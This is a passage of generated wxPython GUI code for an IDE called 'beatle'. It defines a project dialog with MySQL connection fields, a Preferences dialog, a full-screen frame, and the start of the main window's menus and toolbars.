fgSizer60.Add( self.m_textCtrl241, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer59.Add( fgSizer60, 1, wx.EXPAND, 5 ) sbSizer8 = wx.StaticBoxSizer( wx.StaticBox( self.m_panel14, wx.ID_ANY, u"Default 
schema" ), wx.VERTICAL ) m_comboBox1Choices = [] self.m_comboBox1 = wx.ComboBox( sbSizer8.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, m_comboBox1Choices, 0 ) sbSizer8.Add( self.m_comboBox1, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer59.Add( sbSizer8, 1, wx.EXPAND, 5 ) fgSizer61 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer61.AddGrowableCol( 0 ) fgSizer61.SetFlexibleDirection( wx.BOTH ) fgSizer61.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer61.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) self.m_button3 = wx.Button( self.m_panel14, wx.ID_ANY, u"Test connection", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_button3.Enable( False ) fgSizer61.Add( self.m_button3, 0, wx.ALL, 5 ) fgSizer59.Add( fgSizer61, 1, wx.EXPAND, 5 ) self.m_panel14.SetSizer( fgSizer59 ) self.m_panel14.Layout() fgSizer59.Fit( self.m_panel14 ) self.m_choicebook4.AddPage( self.m_panel14, u"mysql", False ) fgSizer58.Add( self.m_choicebook4, 1, wx.EXPAND|wx.TOP|wx.BOTTOM, 5 ) self.m_panel13.SetSizer( fgSizer58 ) self.m_panel13.Layout() fgSizer58.Fit( self.m_panel13 ) self.m_choicebook1.AddPage( self.m_panel13, u"database project", False ) self.fgSizer65.Add( self.m_choicebook1, 1, wx.EXPAND |wx.ALL, 5 ) self.m_panel5.SetSizer( self.fgSizer65 ) self.m_panel5.Layout() self.fgSizer65.Fit( self.m_panel5 ) self.m_auinotebook2.AddPage( self.m_panel5, u"General", True ) self.m_panel6 = wx.Panel( self.m_auinotebook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer69 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer69.AddGrowableCol( 0 ) fgSizer69.AddGrowableRow( 1 ) fgSizer69.SetFlexibleDirection( wx.BOTH ) fgSizer69.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer68 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer68.AddGrowableCol( 1 ) fgSizer68.SetFlexibleDirection( wx.BOTH ) fgSizer68.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText33 = wx.StaticText( self.m_panel6, wx.ID_ANY, u"Author:", wx.DefaultPosition, wx.DefaultSize, 0 ) 
self.m_staticText33.Wrap( -1 ) fgSizer68.Add( self.m_staticText33, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl251 = wx.TextCtrl( self.m_panel6, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer68.Add( self.m_textCtrl251, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText35 = wx.StaticText( self.m_panel6, wx.ID_ANY, u"Date:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText35.Wrap( -1 ) fgSizer68.Add( self.m_staticText35, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_datePicker1 = wx.DatePickerCtrl( self.m_panel6, wx.ID_ANY, wx.DefaultDateTime, wx.DefaultPosition, wx.DefaultSize, wx.DP_DEFAULT|wx.DP_SHOWCENTURY ) fgSizer68.Add( self.m_datePicker1, 0, wx.ALL|wx.EXPAND, 5 ) self.m_checkBox53 = wx.CheckBox( self.m_panel6, wx.ID_ANY, u"Add license:", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer68.Add( self.m_checkBox53, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) m_choice16Choices = [ u"wxWidgets license", u"GNU GPL", u"GNU LGPL", u"FreeBSD", u"Creative Commons" ] self.m_choice16 = wx.Choice( self.m_panel6, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice16Choices, 0 ) self.m_choice16.SetSelection( 0 ) fgSizer68.Add( self.m_choice16, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer69.Add( fgSizer68, 1, wx.EXPAND|wx.TOP|wx.RIGHT|wx.LEFT, 5 ) sbSizer20 = wx.StaticBoxSizer( wx.StaticBox( self.m_panel6, wx.ID_ANY, u"description" ), wx.VERTICAL ) self.m_richText13 = wx.richtext.RichTextCtrl( sbSizer20.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS ) sbSizer20.Add( self.m_richText13, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer69.Add( sbSizer20, 1, wx.EXPAND|wx.RIGHT|wx.LEFT, 5 ) self.m_panel6.SetSizer( fgSizer69 ) self.m_panel6.Layout() fgSizer69.Fit( self.m_panel6 ) self.m_auinotebook2.AddPage( self.m_panel6, u"Autoring", False ) self.m_panel7 = wx.Panel( self.m_auinotebook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) 
fgSizer72 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer72.AddGrowableCol( 0 ) fgSizer72.AddGrowableRow( 0 ) fgSizer72.SetFlexibleDirection( wx.BOTH ) fgSizer72.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer73 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer73.AddGrowableCol( 1 ) fgSizer73.SetFlexibleDirection( wx.BOTH ) fgSizer73.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText3111 = wx.StaticText( self.m_panel7, wx.ID_ANY, u"Project type:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3111.Wrap( -1 ) fgSizer73.Add( self.m_staticText3111, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice151Choices = [ u"unspecified", u"static library", u"dynamic library", u"executable", u"only code" ] self.m_choice151 = wx.Choice( self.m_panel7, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice151Choices, 0 ) self.m_choice151.SetSelection( 3 ) fgSizer73.Add( self.m_choice151, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText321 = wx.StaticText( self.m_panel7, wx.ID_ANY, u"Versión:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText321.Wrap( -1 ) fgSizer73.Add( self.m_staticText321, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer661 = wx.FlexGridSizer( 1, 3, 0, 0 ) fgSizer661.SetFlexibleDirection( wx.BOTH ) fgSizer661.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_spinCtrl11 = wx.SpinCtrl( self.m_panel7, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), wx.SP_ARROW_KEYS, 0, 10, 0 ) fgSizer661.Add( self.m_spinCtrl11, 0, wx.ALL, 5 ) self.m_spinCtrl21 = wx.SpinCtrl( self.m_panel7, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), wx.SP_ARROW_KEYS, 0, 10, 0 ) fgSizer661.Add( self.m_spinCtrl21, 0, wx.ALL, 5 ) self.m_spinCtrl31 = wx.SpinCtrl( self.m_panel7, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), wx.SP_ARROW_KEYS, 0, 10, 0 ) fgSizer661.Add( self.m_spinCtrl31, 0, wx.ALL, 5 ) fgSizer73.Add( fgSizer661, 1, wx.EXPAND, 5 ) self.m_staticText43 = 
wx.StaticText( self.m_panel7, wx.ID_ANY, u"Build:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText43.Wrap( -1 ) fgSizer73.Add( self.m_staticText43, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_checkBox54 = wx.CheckBox( self.m_panel7, wx.ID_ANY, u"create makefile", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer73.Add( self.m_checkBox54, 0, wx.ALL, 5 ) fgSizer72.Add( fgSizer73, 1, wx.EXPAND|wx.TOP|wx.RIGHT|wx.LEFT, 5 ) self.m_panel7.SetSizer( fgSizer72 ) self.m_panel7.Layout() fgSizer72.Fit( self.m_panel7 ) self.m_auinotebook2.AddPage( self.m_panel7, u"Generation", False ) self.fgSizer4.Add( self.m_auinotebook2, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer161 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer161.AddGrowableCol( 1 ) fgSizer161.SetFlexibleDirection( wx.BOTH ) fgSizer161.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer161.SetMinSize( wx.Size( -1,28 ) ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.Size( -1,28 ), wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer161.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer1 = wx.StdDialogButtonSizer() self.m_sdbSizer1OK = wx.Button( self, wx.ID_OK ) m_sdbSizer1.AddButton( self.m_sdbSizer1OK ) self.m_sdbSizer1Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer1.AddButton( self.m_sdbSizer1Cancel ) m_sdbSizer1.Realize(); m_sdbSizer1.SetMinSize( wx.Size( -1,32 ) ) fgSizer161.Add( m_sdbSizer1, 0, wx.EXPAND|wx.TOP|wx.BOTTOM|wx.RIGHT, 5 ) self.fgSizer4.Add( fgSizer161, 0, wx.EXPAND, 5 ) self.SetSizer( self.fgSizer4 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_textCtrl1.Bind( wx.EVT_TEXT, self.OnChangeProjectName ) self.m_bpButton3.Bind( wx.EVT_BUTTON, self.OnChooseDir ) self.m_choicebook1.Bind( wx.EVT_CHOICEBOOK_PAGE_CHANGED, self.OnPageChanged ) self.m_choicebook1.Bind( wx.EVT_CHOICEBOOK_PAGE_CHANGING, self.OnPageChanging ) self.m_checkBox52.Bind( wx.EVT_CHECKBOX, self.OnToggleMasterInclude ) self.m_textCtrl252.Bind( 
wx.EVT_TEXT, self.on_mysql_host_change )
        self.m_textCtrl231.Bind( wx.EVT_TEXT, self.on_mysql_user_change )
        self.m_textCtrl241.Bind( wx.EVT_TEXT, self.on_mysql_password_change )
        self.m_button3.Bind( wx.EVT_BUTTON, self.OnTestDatabaseConnection )
        self.m_sdbSizer1OK.Bind( wx.EVT_BUTTON, self.OnOK )

    def __del__( self ):
        pass

    # Virtual event handlers, override them in your derived class
    def OnChangeProjectName( self, event ):
        event.Skip()

    def OnChooseDir( self, event ):
        event.Skip()

    def OnPageChanged( self, event ):
        event.Skip()

    def OnPageChanging( self, event ):
        event.Skip()

    def OnToggleMasterInclude( self, event ):
        event.Skip()

    def on_mysql_host_change( self, event ):
        event.Skip()

    def on_mysql_user_change( self, event ):
        event.Skip()

    def on_mysql_password_change( self, event ):
        event.Skip()

    def OnTestDatabaseConnection( self, event ):
        event.Skip()

    def OnOK( self, event ):
        event.Skip()


###########################################################################
## Class Preferences
###########################################################################

class Preferences ( wx.Dialog ):
    # Preferences dialog: an AUI notebook (pages are added elsewhere) above a
    # tip button and a standard OK/Cancel button row.

    def __init__( self, parent ):
        wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Preferences", pos = wx.DefaultPosition, size = wx.Size( 668,418 ), style = wx.DEFAULT_DIALOG_STYLE )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )

        fgSizer77 = wx.FlexGridSizer( 3, 1, 0, 0 )
        fgSizer77.AddGrowableCol( 0 )
        fgSizer77.AddGrowableRow( 0 )
        fgSizer77.SetFlexibleDirection( wx.BOTH )
        fgSizer77.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_auinotebook3 = wx.aui.AuiNotebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_NB_BOTTOM )
        fgSizer77.Add( self.m_auinotebook3, 1, wx.EXPAND |wx.ALL, 5 )

        fgSizer164 = wx.FlexGridSizer( 1, 2, 0, 0 )
        fgSizer164.AddGrowableCol( 1 )
        fgSizer164.SetFlexibleDirection( wx.BOTH )
        fgSizer164.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )

        self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER )
        fgSizer164.Add( self.m_info, 0, wx.ALIGN_RIGHT, 5 )

        m_sdbSizer3 = wx.StdDialogButtonSizer()
        self.m_sdbSizer3OK = wx.Button( self, wx.ID_OK )
        m_sdbSizer3.AddButton( self.m_sdbSizer3OK )
        self.m_sdbSizer3Cancel = wx.Button( self, wx.ID_CANCEL )
        m_sdbSizer3.AddButton( self.m_sdbSizer3Cancel )
        m_sdbSizer3.Realize();
        fgSizer164.Add( m_sdbSizer3, 1, wx.EXPAND, 5 )

        fgSizer77.Add( fgSizer164, 1, wx.EXPAND|wx.BOTTOM, 5 )

        self.SetSizer( fgSizer77 )
        self.Layout()

        self.Centre( wx.BOTH )

        # Connect Events
        self.Bind( wx.EVT_INIT_DIALOG, self.OnInitDialog )
        self.m_sdbSizer3OK.Bind( wx.EVT_BUTTON, self.OnOK )

    def __del__( self ):
        pass

    # Virtual event handlers, override them in your derived class
    def OnInitDialog( self, event ):
        event.Skip()

    def OnOK( self, event ):
        event.Skip()


###########################################################################
## Class FullScreen
###########################################################################

class FullScreen ( wx.Frame ):
    # Maximized, stay-on-top, borderless-content frame. NOTE(review):
    # presumably a full-screen host window — confirm with callers.

    def __init__( self, parent ):
        wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.MAXIMIZE|wx.STAY_ON_TOP|wx.TAB_TRAVERSAL )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )
        self.SetExtraStyle( wx.WS_EX_BLOCK_EVENTS|wx.WS_EX_TRANSIENT )

        self.Centre( wx.BOTH )

    def __del__( self ):
        pass


###########################################################################
## Class MainWindow
###########################################################################

class MainWindow ( wx.Frame ):
    # Main application frame: menu bar, AUI-managed toolbars, view/editor
    # notebooks and auxiliary panes (console/log/output/search).

    def __init__( self, parent ):
        wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"beatle", pos = wx.DefaultPosition, size = wx.Size( 1124,740 ), style = wx.DEFAULT_FRAME_STYLE|wx.SYSTEM_MENU|wx.TAB_TRAVERSAL )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )

        # AUI manager owns all dockable panes of this frame
        self.m_mgr = wx.aui.AuiManager()
        self.m_mgr.SetManagedWindow( self )
        self.m_mgr.SetFlags(wx.aui.AUI_MGR_ALLOW_FLOATING|wx.aui.AUI_MGR_TRANSPARENT_DRAG|wx.aui.AUI_MGR_TRANSPARENT_HINT)

        # --- menu bar ---------------------------------------------------------
        self.m_menubar1 = wx.MenuBar( wx.MB_DOCKABLE )
        self.menuFile = wx.Menu()
        self.newWorkspace = wx.MenuItem( self.menuFile, ID_NEW_WORKSPACE, u"New workspace", u"create a new workspace", wx.ITEM_NORMAL )
        self.newWorkspace.SetBitmap( wx.Bitmap( localpath('app/res/workspace.xpm'), wx.BITMAP_TYPE_ANY ) )
        self.menuFile.AppendItem( self.newWorkspace )

        self.newProject = wx.MenuItem( self.menuFile, ID_NEW_PROJECT, u"New project"+ u"\t" + u"Ctrl+N", u"create a new project", wx.ITEM_NORMAL )
        self.newProject.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_NEW, wx.ART_MENU ) )
        self.menuFile.AppendItem( self.newProject )

        self.menuFile.AppendSeparator()

        self.openWorkspace = wx.MenuItem( self.menuFile, ID_OPEN_WORKSPACE, u"Open workspace...", u"open an existing workspace", wx.ITEM_NORMAL )
        self.menuFile.AppendItem( self.openWorkspace )

        self.openProject = wx.MenuItem( self.menuFile, ID_OPEN_PROJECT, u"Open project ..."+ u"\t" + u"Ctrl+O", u"open an existing project", wx.ITEM_NORMAL )
        self.openProject.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ) )
        self.menuFile.AppendItem( self.openProject )

        # most-recently-used submenu; entries are filled elsewhere
        self.menuMRU = wx.Menu()
        self.menuFile.AppendSubMenu( self.menuMRU, u"Recent files" )

        self.menuFile.AppendSeparator()

        self.m_menuItem26 = wx.MenuItem( self.menuFile, ID_CLOSE_WORKSPACE, u"Close workspace", wx.EmptyString, wx.ITEM_NORMAL )
        self.menuFile.AppendItem( self.m_menuItem26 )

        self.m_menuItem27 = wx.MenuItem( self.menuFile, ID_CLOSE_PROJECT, u"Close project", wx.EmptyString, wx.ITEM_NORMAL )
        self.menuFile.AppendItem( self.m_menuItem27 )

        self.menuFile.AppendSeparator()

        self.importProject = wx.MenuItem( self.menuFile, ID_IMPORT_PROJECT, u"Import ...", u"import external project in current workspace", wx.ITEM_NORMAL )
        self.menuFile.AppendItem( self.importProject )

        self.menuFile.AppendSeparator()

        self.saveWorkspace = wx.MenuItem( self.menuFile, ID_SAVE_WORKSPACE, u"Save workspace", u"save current workspace", wx.ITEM_NORMAL )
        self.saveWorkspace.SetBitmap( wx.Bitmap( localpath('app/res/save_all.xpm'), wx.BITMAP_TYPE_ANY ) )
        self.menuFile.AppendItem( self.saveWorkspace )

        self.saveProject = wx.MenuItem( self.menuFile, ID_SAVE_PROJECT, u"Save project"+ u"\t" + u"Ctrl+S", u"save current project", wx.ITEM_NORMAL )
        self.saveProject.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_FILE_SAVE, wx.ART_MENU ) )
        self.menuFile.AppendItem( self.saveProject )

        self.menuFile.AppendSeparator()

        self.quit = wx.MenuItem( self.menuFile, ID_QUIT, u"Quit"+ u"\t" + u"Ctrl+F4", u"exit application", wx.ITEM_NORMAL )
        self.quit.SetBitmap( wx.ArtProvider.GetBitmap( u"gtk-quit", wx.ART_MENU ) )
        self.menuFile.AppendItem( self.quit )

        self.m_menubar1.Append( self.menuFile, u"&Main" )

        self.menuEdit = wx.Menu()
        self.undo = wx.MenuItem( self.menuEdit, ID_UNDO, u"Undo"+ u"\t" + u"Ctrl+Z", u"undoes the last operation", wx.ITEM_NORMAL )
        self.undo.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_UNDO, wx.ART_TOOLBAR ) )
        self.menuEdit.AppendItem( self.undo )

        self.redo = wx.MenuItem( self.menuEdit, ID_REDO, u"Redo"+ u"\t" + u"Ctrl+Y", u"redoes the last operation", wx.ITEM_NORMAL )
        self.redo.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_REDO, wx.ART_TOOLBAR ) )
        self.menuEdit.AppendItem( self.redo )

        self.menuEdit.AppendSeparator()

        self.copy = wx.MenuItem( self.menuEdit, ID_COPY, u"Copy"+ u"\t" + u"Ctrl+C", u"copy the selected element", wx.ITEM_NORMAL )
        self.copy.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_COPY, wx.ART_MENU ) )
        self.menuEdit.AppendItem( self.copy )

        self.cut = wx.MenuItem( self.menuEdit, ID_CUT, u"Cut"+ u"\t" + u"Ctrl+X", u"cut the selected element", wx.ITEM_NORMAL )
        self.cut.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_CUT, wx.ART_MENU ) )
        self.menuEdit.AppendItem( self.cut )

        self.paste = wx.MenuItem( self.menuEdit, ID_PASTE, u"Paste"+ u"\t" + u"Ctrl+V", u"paste from clipboard", wx.ITEM_NORMAL )
        self.paste.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_PASTE, wx.ART_MENU ) )
        self.menuEdit.AppendItem( self.paste )

        self.menuEdit.AppendSeparator()

        self.delete = wx.MenuItem( self.menuEdit, ID_DELETE, u"Delete"+ u"\t" + u"Del", u"delete the selected element", wx.ITEM_NORMAL )
        self.delete.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_DELETE, wx.ART_MENU ) )
        self.menuEdit.AppendItem( self.delete )

        self.menuEdit.AppendSeparator()

        self.editOpen = wx.MenuItem( self.menuEdit, ID_EDIT_OPEN, u"Open ...", u"open the selected element", wx.ITEM_NORMAL )
        self.editOpen.SetBitmap( wx.ArtProvider.GetBitmap( u"gtk-edit", wx.ART_MENU ) )
        self.menuEdit.AppendItem( self.editOpen )

        self.editContext = wx.MenuItem( self.menuEdit, ID_EDIT_CONTEXT, u"Select contexts ..."+ u"\t" + u"Ctrl+Shift+C", u"edit the context of selected element", wx.ITEM_NORMAL )
        self.menuEdit.AppendItem( self.editContext )

        self.editUserSections = wx.MenuItem( self.menuEdit, ID_EDIT_USER_SECTIONS, u"Edit user sections ...", u"edit the user sections", wx.ITEM_NORMAL )
        self.menuEdit.AppendItem( self.editUserSections )

        self.editProperties = wx.MenuItem( self.menuEdit, ID_EDIT_PROPERTIES, u"Properties ..."+ u"\t" + u"Ctrl+Enter", u"edit the properties of selected element", wx.ITEM_NORMAL )
        self.editProperties.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_INFORMATION, wx.ART_MENU ) )
        self.menuEdit.AppendItem( self.editProperties )

        self.menuEdit.AppendSeparator()

        self.preferences = wx.MenuItem( self.menuEdit, ID_PREFERENCES, u"Preferences", u"edit the application preferences", wx.ITEM_NORMAL )
        self.preferences.SetBitmap( wx.ArtProvider.GetBitmap( u"gtk-preferences", wx.ART_TOOLBAR ) )
        self.menuEdit.AppendItem( self.preferences )

        self.m_menubar1.Append( self.menuEdit, u"&Edit" )

        self.menuSearch = wx.Menu()
        self.find = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"&Find ...", u"find any occurrence ", wx.ITEM_NORMAL )
        self.menuSearch.AppendItem( self.find )

        self.findInFiles = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"Find in files ...", u"find any ocurrence in files", wx.ITEM_NORMAL )
        self.menuSearch.AppendItem( self.findInFiles )

        self.next = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"Next"+ u"\t" + u"F3", wx.EmptyString, wx.ITEM_NORMAL )
        self.menuSearch.AppendItem( self.next )

        self.previous = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"previous"+ u"\t" + u"Shift+F3", wx.EmptyString, wx.ITEM_NORMAL )
        self.menuSearch.AppendItem( self.previous )

        self.m_menubar1.Append( self.menuSearch, u"&Search" )

        self.menuView = wx.Menu()
        self.menuView.AppendSeparator()

        self.m_menuItem72 = wx.MenuItem( self.menuView, wx.ID_ANY, u"Reset perspective", wx.EmptyString, wx.ITEM_NORMAL )
        self.menuView.AppendItem( self.m_menuItem72 )

        self.m_view_showToolbars = wx.MenuItem( self.menuView, wx.ID_ANY, u"show toolbars", u"Show all the current view toolbars", wx.ITEM_NORMAL )
        self.menuView.AppendItem( self.m_view_showToolbars )

        # both pane-visibility toggles start checked
        self.m_views = wx.MenuItem( self.menuView, wx.ID_ANY, u"Views", wx.EmptyString, wx.ITEM_CHECK )
        self.menuView.AppendItem( self.m_views )
        self.m_views.Check( True )

        self.m_auxiliarPanes = wx.MenuItem( self.menuView, wx.ID_ANY, u"Auxiliar panes", wx.EmptyString, wx.ITEM_CHECK )
        self.menuView.AppendItem( self.m_auxiliarPanes )
        self.m_auxiliarPanes.Check( True )

        self.m_menubar1.Append( self.menuView, u"&View" )

        self.menuSettings = wx.Menu()
        self.compilerSettings = wx.MenuItem( self.menuSettings, wx.ID_ANY, u"build &tools ...", u"configure build tools", wx.ITEM_NORMAL )
        self.menuSettings.AppendItem( self.compilerSettings )

        self.m_menubar1.Append( self.menuSettings, u"S&ettings" )

        # empty menus; entries are appended elsewhere
        self.menuTools = wx.Menu()
        self.m_menubar1.Append( self.menuTools, u"&Tools" )

        self.menuHelp = wx.Menu()
        self.m_menubar1.Append( self.menuHelp, u"&Help" )

        self.SetMenuBar( self.m_menubar1 )

        # --- file toolbar -----------------------------------------------------
        self.m_auiToolBarFile = wx.aui.AuiToolBar( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_TB_GRIPPER|wx.aui.AUI_TB_HORZ_LAYOUT )
        self.m_new_workspace = self.m_auiToolBarFile.AddTool( ID_NEW_WORKSPACE, u"new workspace", wx.Bitmap( localpath('app/res/workspace.xpm'), wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, u"new project", wx.EmptyString, None )

        self.m_new = self.m_auiToolBarFile.AddTool( ID_NEW_PROJECT, u"new project", wx.ArtProvider.GetBitmap( wx.ART_NEW, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"new project", wx.EmptyString, None )

        self.m_open = self.m_auiToolBarFile.AddTool( ID_OPEN_PROJECT, u"open project", wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"open project", wx.EmptyString, None )

        self.m_save_project = self.m_auiToolBarFile.AddTool( ID_SAVE_PROJECT, u"save project", wx.ArtProvider.GetBitmap( wx.ART_FILE_SAVE, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"save current", wx.EmptyString, None )

        self.m_save_workspace = self.m_auiToolBarFile.AddTool( ID_SAVE_WORKSPACE, u"tool", wx.Bitmap( localpath('app/res/save_all.xpm'), wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, u"save workspace", wx.EmptyString, None )

        self.m_auiToolBarFile.Realize()
        self.m_mgr.AddPane( self.m_auiToolBarFile, wx.aui.AuiPaneInfo().Name( u"file_toolbar" ).Top().Caption( u"file" ).PinButton( True ).Gripper().Dock().Resizable().FloatingSize( wx.Size( -1,-1 ) ).Row( 0 ).Position( 0 ).Layer( 10 ).ToolbarPane() )

        # --- edit toolbar -----------------------------------------------------
        self.m_auiToolBarEdit = wx.aui.AuiToolBar( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_TB_GRIPPER|wx.aui.AUI_TB_HORZ_LAYOUT )
        self.m_undo = self.m_auiToolBarEdit.AddTool( ID_UNDO, u"tool", wx.ArtProvider.GetBitmap( wx.ART_UNDO, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"undo last operation", wx.EmptyString, None )

        self.m_redo = self.m_auiToolBarEdit.AddTool( ID_REDO, u"tool", wx.ArtProvider.GetBitmap( wx.ART_REDO, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"redo last operation", wx.EmptyString, None )

        self.m_auiToolBarEdit.AddSeparator()

        self.m_copy = self.m_auiToolBarEdit.AddTool( ID_COPY, u"copy", wx.ArtProvider.GetBitmap( wx.ART_COPY, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"copy selected", wx.EmptyString, None )

        self.m_cut = self.m_auiToolBarEdit.AddTool( ID_CUT, u"cut", wx.ArtProvider.GetBitmap( wx.ART_CUT, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"cut selected", wx.EmptyString, None )

        self.m_paste = self.m_auiToolBarEdit.AddTool( ID_PASTE, u"paste", wx.ArtProvider.GetBitmap( wx.ART_PASTE, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"paste from clipboard", wx.EmptyString, None )

        self.m_auiToolBarEdit.AddSeparator()

        self.m_delete = self.m_auiToolBarEdit.AddTool( ID_DELETE, u"delete", wx.ArtProvider.GetBitmap( wx.ART_DELETE, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"delete selected", wx.EmptyString, None )

        self.m_auiToolBarEdit.Realize()
        self.m_mgr.AddPane( self.m_auiToolBarEdit, wx.aui.AuiPaneInfo().Name( u"edit_toolbar" ).Top().Caption( u"edit" ).PinButton( True ).Gripper().Dock().Resizable().FloatingSize( wx.Size( -1,-1 ) ).Row( 0 ).Position( 1 ).Layer( 10 ).ToolbarPane() )

        self.m_statusBar1 = self.CreateStatusBar( 2, wx.ST_SIZEGRIP, wx.ID_ANY )

        # --- notebooks (wxx.AuiNotebook is a project-local subclass) ----------
        self.viewBook = wxx.AuiNotebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( 300,-1 ), wx.aui.AUI_NB_BOTTOM|wx.aui.AUI_NB_SCROLL_BUTTONS|wx.aui.AUI_NB_TAB_EXTERNAL_MOVE|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TOP|wx.aui.AUI_NB_WINDOWLIST_BUTTON|wx.NO_BORDER )
        self.viewBook.SetMinSize( wx.Size( 300,-1 ) )

